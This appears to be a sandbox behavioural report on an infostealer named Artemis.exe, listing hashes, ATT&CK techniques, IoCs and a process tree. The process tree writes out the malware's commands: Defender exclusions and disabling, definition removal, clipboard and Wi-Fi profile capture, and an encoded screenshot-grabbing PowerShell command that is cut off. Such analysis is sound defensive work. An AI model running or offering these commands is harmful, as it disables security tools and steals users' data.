ddb02a8236ec58cf366d1c44dd3d52f9c05afbea021e405871fd06dd5269db61

Analysis

max time kernel
11s
max time network
13s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-01-2025 14:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Artemis.exe
Size

6.9MB
MD5

36e86f68be64f78a1c75e74eb70a33c5
SHA1

46417b4d9694e5a02e93504b0f30ebdfd5eef51d
SHA256

ddb02a8236ec58cf366d1c44dd3d52f9c05afbea021e405871fd06dd5269db61
SHA512

563dc383d1c0836ee1bb271db8482e6d68d5bd67995366eafa11087580f3ec66ab80b53d126e4ffe89beb223ab78bcd53286214f7ef185d8adf5286e0517c961
SSDEEP

196608:KrLO4FrTaeN/FJMIDJf0gsAGK/SERRouAKh1Ad:Q/Fqyf0gst2DAKC

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3168	powershell.exe
4444	powershell.exe
948	powershell.exe
2608	powershell.exe
1824	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Artemis.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3904	cmd.exe
3960	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3500	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe
5028	Artemis.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
30	discord.com
31	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
27	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1636	tasklist.exe
3384	tasklist.exe
4848	tasklist.exe
4528	tasklist.exe
2328	tasklist.exe

UPX packed file 45 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023ca7-62.dat	upx
behavioral1/memory/5028-66-0x00007FFE19E20000-0x00007FFE1A28E000-memory.dmp	upx
behavioral1/files/0x0007000000023c73-69.dat	upx
behavioral1/memory/5028-71-0x00007FFE1E7C0000-0x00007FFE1E7E4000-memory.dmp	upx
behavioral1/files/0x0007000000023ca5-70.dat	upx
behavioral1/memory/5028-73-0x00007FFE23EB0000-0x00007FFE23EBF000-memory.dmp	upx
behavioral1/files/0x0007000000023c77-123.dat	upx
behavioral1/files/0x0007000000023c75-122.dat	upx
behavioral1/files/0x0007000000023c7a-126.dat	upx
behavioral1/files/0x0007000000023c79-125.dat	upx
behavioral1/files/0x0007000000023c78-124.dat	upx
behavioral1/files/0x0007000000023c74-121.dat	upx
behavioral1/files/0x0007000000023c72-120.dat	upx
behavioral1/files/0x0007000000023cad-119.dat	upx
behavioral1/files/0x0007000000023cab-118.dat	upx
behavioral1/files/0x0007000000023caa-117.dat	upx
behavioral1/files/0x0007000000023ca6-114.dat	upx
behavioral1/files/0x0007000000023ca4-113.dat	upx
behavioral1/memory/5028-131-0x00007FFE1E790000-0x00007FFE1E7BD000-memory.dmp	upx
behavioral1/memory/5028-132-0x00007FFE23460000-0x00007FFE23479000-memory.dmp	upx
behavioral1/memory/5028-133-0x00007FFE22120000-0x00007FFE2213F000-memory.dmp	upx
behavioral1/memory/5028-134-0x00007FFE19CA0000-0x00007FFE19E11000-memory.dmp	upx
behavioral1/memory/5028-135-0x00007FFE207E0000-0x00007FFE207F9000-memory.dmp	upx
behavioral1/memory/5028-136-0x00007FFE20570000-0x00007FFE2057D000-memory.dmp	upx
behavioral1/memory/5028-137-0x00007FFE1B110000-0x00007FFE1B13E000-memory.dmp	upx
behavioral1/memory/5028-138-0x00007FFE19E20000-0x00007FFE1A28E000-memory.dmp	upx
behavioral1/memory/5028-142-0x00007FFE1E7C0000-0x00007FFE1E7E4000-memory.dmp	upx
behavioral1/memory/5028-141-0x00007FFE0B760000-0x00007FFE0BAD5000-memory.dmp	upx
behavioral1/memory/5028-139-0x00007FFE1AA20000-0x00007FFE1AAD8000-memory.dmp	upx
behavioral1/memory/5028-145-0x00007FFE20560000-0x00007FFE2056D000-memory.dmp	upx
behavioral1/memory/5028-144-0x00007FFE1E790000-0x00007FFE1E7BD000-memory.dmp	upx
behavioral1/memory/5028-143-0x00007FFE1B0F0000-0x00007FFE1B104000-memory.dmp	upx
behavioral1/memory/5028-147-0x00007FFE0B640000-0x00007FFE0B758000-memory.dmp	upx
behavioral1/memory/5028-146-0x00007FFE23460000-0x00007FFE23479000-memory.dmp	upx
behavioral1/memory/5028-170-0x00007FFE22120000-0x00007FFE2213F000-memory.dmp	upx
behavioral1/memory/5028-182-0x00007FFE19CA0000-0x00007FFE19E11000-memory.dmp	upx
behavioral1/memory/5028-250-0x00007FFE207E0000-0x00007FFE207F9000-memory.dmp	upx
behavioral1/memory/5028-320-0x00007FFE1B110000-0x00007FFE1B13E000-memory.dmp	upx
behavioral1/memory/5028-324-0x00007FFE1AA20000-0x00007FFE1AAD8000-memory.dmp	upx
behavioral1/memory/5028-326-0x00007FFE0B760000-0x00007FFE0BAD5000-memory.dmp	upx
behavioral1/memory/5028-347-0x00007FFE19E20000-0x00007FFE1A28E000-memory.dmp	upx
behavioral1/memory/5028-362-0x00007FFE20560000-0x00007FFE2056D000-memory.dmp	upx
behavioral1/memory/5028-353-0x00007FFE19CA0000-0x00007FFE19E11000-memory.dmp	upx
behavioral1/memory/5028-352-0x00007FFE22120000-0x00007FFE2213F000-memory.dmp	upx
behavioral1/memory/5028-348-0x00007FFE1E7C0000-0x00007FFE1E7E4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3508	cmd.exe
3836	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4504	WMIC.exe
2648	WMIC.exe
2020	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3864	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3168	powershell.exe
2608	powershell.exe
2608	powershell.exe
3168	powershell.exe
4444	powershell.exe
4444	powershell.exe
3960	powershell.exe
3960	powershell.exe
3960	powershell.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe
1824	powershell.exe
1824	powershell.exe
3944	powershell.exe
3944	powershell.exe
948	powershell.exe
948	powershell.exe
1348	powershell.exe
1348	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4848	tasklist.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeIncreaseQuotaPrivilege	1572	WMIC.exe
Token: SeSecurityPrivilege	1572	WMIC.exe
Token: SeTakeOwnershipPrivilege	1572	WMIC.exe
Token: SeLoadDriverPrivilege	1572	WMIC.exe
Token: SeSystemProfilePrivilege	1572	WMIC.exe
Token: SeSystemtimePrivilege	1572	WMIC.exe
Token: SeProfSingleProcessPrivilege	1572	WMIC.exe
Token: SeIncBasePriorityPrivilege	1572	WMIC.exe
Token: SeCreatePagefilePrivilege	1572	WMIC.exe
Token: SeBackupPrivilege	1572	WMIC.exe
Token: SeRestorePrivilege	1572	WMIC.exe
Token: SeShutdownPrivilege	1572	WMIC.exe
Token: SeDebugPrivilege	1572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1572	WMIC.exe
Token: SeRemoteShutdownPrivilege	1572	WMIC.exe
Token: SeUndockPrivilege	1572	WMIC.exe
Token: SeManageVolumePrivilege	1572	WMIC.exe
Token: 33	1572	WMIC.exe
Token: 34	1572	WMIC.exe
Token: 35	1572	WMIC.exe
Token: 36	1572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1572	WMIC.exe
Token: SeSecurityPrivilege	1572	WMIC.exe
Token: SeTakeOwnershipPrivilege	1572	WMIC.exe
Token: SeLoadDriverPrivilege	1572	WMIC.exe
Token: SeSystemProfilePrivilege	1572	WMIC.exe
Token: SeSystemtimePrivilege	1572	WMIC.exe
Token: SeProfSingleProcessPrivilege	1572	WMIC.exe
Token: SeIncBasePriorityPrivilege	1572	WMIC.exe
Token: SeCreatePagefilePrivilege	1572	WMIC.exe
Token: SeBackupPrivilege	1572	WMIC.exe
Token: SeRestorePrivilege	1572	WMIC.exe
Token: SeShutdownPrivilege	1572	WMIC.exe
Token: SeDebugPrivilege	1572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1572	WMIC.exe
Token: SeRemoteShutdownPrivilege	1572	WMIC.exe
Token: SeUndockPrivilege	1572	WMIC.exe
Token: SeManageVolumePrivilege	1572	WMIC.exe
Token: 33	1572	WMIC.exe
Token: 34	1572	WMIC.exe
Token: 35	1572	WMIC.exe
Token: 36	1572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2020	WMIC.exe
Token: SeSecurityPrivilege	2020	WMIC.exe
Token: SeTakeOwnershipPrivilege	2020	WMIC.exe
Token: SeLoadDriverPrivilege	2020	WMIC.exe
Token: SeSystemProfilePrivilege	2020	WMIC.exe
Token: SeSystemtimePrivilege	2020	WMIC.exe
Token: SeProfSingleProcessPrivilege	2020	WMIC.exe
Token: SeIncBasePriorityPrivilege	2020	WMIC.exe
Token: SeCreatePagefilePrivilege	2020	WMIC.exe
Token: SeBackupPrivilege	2020	WMIC.exe
Token: SeRestorePrivilege	2020	WMIC.exe
Token: SeShutdownPrivilege	2020	WMIC.exe
Token: SeDebugPrivilege	2020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2020	WMIC.exe
Token: SeRemoteShutdownPrivilege	2020	WMIC.exe
Token: SeUndockPrivilege	2020	WMIC.exe
Token: SeManageVolumePrivilege	2020	WMIC.exe
Token: 33	2020	WMIC.exe
Token: 34	2020	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1340 wrote to memory of 5028	1340	Artemis.exe	84
PID 1340 wrote to memory of 5028	1340	Artemis.exe	84
PID 5028 wrote to memory of 5112	5028	Artemis.exe	85
PID 5028 wrote to memory of 5112	5028	Artemis.exe	85
PID 5028 wrote to memory of 3500	5028	Artemis.exe	86
PID 5028 wrote to memory of 3500	5028	Artemis.exe	86
PID 5028 wrote to memory of 1696	5028	Artemis.exe	88
PID 5028 wrote to memory of 1696	5028	Artemis.exe	88
PID 1696 wrote to memory of 4848	1696	cmd.exe	91
PID 1696 wrote to memory of 4848	1696	cmd.exe	91
PID 3500 wrote to memory of 2608	3500	cmd.exe	92
PID 3500 wrote to memory of 2608	3500	cmd.exe	92
PID 5112 wrote to memory of 3168	5112	cmd.exe	93
PID 5112 wrote to memory of 3168	5112	cmd.exe	93
PID 5028 wrote to memory of 1856	5028	Artemis.exe	94
PID 5028 wrote to memory of 1856	5028	Artemis.exe	94
PID 1856 wrote to memory of 1572	1856	cmd.exe	97
PID 1856 wrote to memory of 1572	1856	cmd.exe	97
PID 5028 wrote to memory of 704	5028	Artemis.exe	98
PID 5028 wrote to memory of 704	5028	Artemis.exe	98
PID 704 wrote to memory of 4684	704	cmd.exe	100
PID 704 wrote to memory of 4684	704	cmd.exe	100
PID 5028 wrote to memory of 3896	5028	Artemis.exe	101
PID 5028 wrote to memory of 3896	5028	Artemis.exe	101
PID 3896 wrote to memory of 3952	3896	cmd.exe	103
PID 3896 wrote to memory of 3952	3896	cmd.exe	103
PID 5028 wrote to memory of 3140	5028	Artemis.exe	104
PID 5028 wrote to memory of 3140	5028	Artemis.exe	104
PID 3140 wrote to memory of 2020	3140	cmd.exe	106
PID 3140 wrote to memory of 2020	3140	cmd.exe	106
PID 5028 wrote to memory of 684	5028	Artemis.exe	107
PID 5028 wrote to memory of 684	5028	Artemis.exe	107
PID 684 wrote to memory of 4504	684	cmd.exe	109
PID 684 wrote to memory of 4504	684	cmd.exe	109
PID 5028 wrote to memory of 2392	5028	Artemis.exe	110
PID 5028 wrote to memory of 2392	5028	Artemis.exe	110
PID 2392 wrote to memory of 4444	2392	cmd.exe	112
PID 2392 wrote to memory of 4444	2392	cmd.exe	112
PID 5028 wrote to memory of 756	5028	Artemis.exe	113
PID 5028 wrote to memory of 756	5028	Artemis.exe	113
PID 5028 wrote to memory of 2824	5028	Artemis.exe	114
PID 5028 wrote to memory of 2824	5028	Artemis.exe	114
PID 756 wrote to memory of 4528	756	cmd.exe	117
PID 756 wrote to memory of 4528	756	cmd.exe	117
PID 2824 wrote to memory of 2328	2824	cmd.exe	118
PID 2824 wrote to memory of 2328	2824	cmd.exe	118
PID 5028 wrote to memory of 2616	5028	Artemis.exe	119
PID 5028 wrote to memory of 2616	5028	Artemis.exe	119
PID 5028 wrote to memory of 3904	5028	Artemis.exe	176
PID 5028 wrote to memory of 3904	5028	Artemis.exe	176
PID 3904 wrote to memory of 3960	3904	cmd.exe	123
PID 3904 wrote to memory of 3960	3904	cmd.exe	123
PID 5028 wrote to memory of 3120	5028	Artemis.exe	124
PID 5028 wrote to memory of 3120	5028	Artemis.exe	124
PID 5028 wrote to memory of 1936	5028	Artemis.exe	125
PID 5028 wrote to memory of 1936	5028	Artemis.exe	125
PID 5028 wrote to memory of 3508	5028	Artemis.exe	128
PID 5028 wrote to memory of 3508	5028	Artemis.exe	128
PID 5028 wrote to memory of 3948	5028	Artemis.exe	130
PID 5028 wrote to memory of 3948	5028	Artemis.exe	130
PID 2616 wrote to memory of 2896	2616	cmd.exe	131
PID 2616 wrote to memory of 2896	2616	cmd.exe	131
PID 5028 wrote to memory of 1200	5028	Artemis.exe	132
PID 5028 wrote to memory of 1200	5028	Artemis.exe	132

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2084	attrib.exe
3784	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Artemis.exe
"C:\Users\Admin\AppData\Local\Temp\Artemis.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1340
- C:\Users\Admin\AppData\Local\Temp\Artemis.exe
  "C:\Users\Admin\AppData\Local\Temp\Artemis.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Artemis.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Artemis.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1696
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:704
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:756
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3120
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1936
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3508
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3948
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1200
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9AC